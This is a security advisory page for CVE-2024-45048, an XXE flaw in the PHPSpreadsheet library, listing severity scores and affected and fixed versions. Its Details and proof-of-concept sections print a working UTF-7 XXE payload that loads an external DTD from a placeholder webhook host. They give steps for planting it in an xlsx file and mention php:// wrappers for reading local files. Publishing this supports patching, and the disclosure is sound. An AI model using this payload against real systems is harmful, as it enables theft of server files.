GHSA-ghg6-32f9-2jp7

Source

https://github.com/advisories/GHSA-ghg6-32f9-2jp7

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/08/GHSA-ghg6-32f9-2jp7/GHSA-ghg6-32f9-2jp7.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-ghg6-32f9-2jp7

Aliases

CVE-2024-45048

Published

2024-08-29T17:58:27Z

Modified

2025-03-06T18:36:49.588031Z

Severity

8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator

Summary

XXE in PHPSpreadsheet encoding is returned

Details

Summary

Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)

Details

Check $pattern = '/encoding="(.*?)"/'; easy to bypass. Just use a single quote symbol '. So payload looks like this:

<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>

If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.

PoC

1) Create simple xlsx file 2) Rename xlsx to zip 3) Go to the zip and open the xl/sharedStrings.xml file in edit mode. 4) Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to

<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>

5) Save sharedStrings.xml file and rename zip back to xlsx. 6) Use minimal php code that simply opens this xlsx file:

use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");

7) You will receive the request to your http://%webhook%/file.dtd 8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.

Impact

Read local files lfi

Database specific

{
    "github_reviewed_at": "2024-08-29T17:58:27Z",
    "cwe_ids": [
        "CWE-611"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "nvd_published_at": "2024-08-28T21:15:06Z"
}

References

Affected packages

Packagist / phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.29.1

Affected versions

1.*

1.0.0-beta

1.0.0-beta2

1.0.0

1.1.0

1.2.0

1.2.1

1.3.0

1.3.1

1.4.0

1.4.1

1.5.0

1.5.1

1.5.2

1.6.0

1.7.0

1.8.0

1.8.1

1.8.2

1.9.0

1.10.0

1.10.1

1.11.0

1.12.0

1.13.0

1.14.0

1.14.1

1.15.0

1.16.0

1.17.0

1.17.1

1.18.0

1.19.0

1.20.0

1.21.0

1.22.0

1.23.0

1.24.0

1.24.1

1.25.0

1.25.1

1.25.2

1.26.0

1.27.0

1.27.1

1.28.0

1.29.0

Packagist / phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

2.2.0

Fixed

2.2.1

Affected versions

2.*

2.2.0

Packagist / phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

2.0.0

Fixed

2.1.1

Affected versions

2.*

2.0.0

2.1.0

Packagist / phpoffice/phpexcel

Package

Name: phpoffice/phpexcel
Purl: pkg:composer/phpoffice/phpexcel

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Last affected

1.8.2

Affected versions

1.*

1.7.9-rc1

1.7.9

1.8.0rc1

1.8.0rc2

1.8.0rc3

1.8.0rc4

1.8.0

1.8.1

1.8.2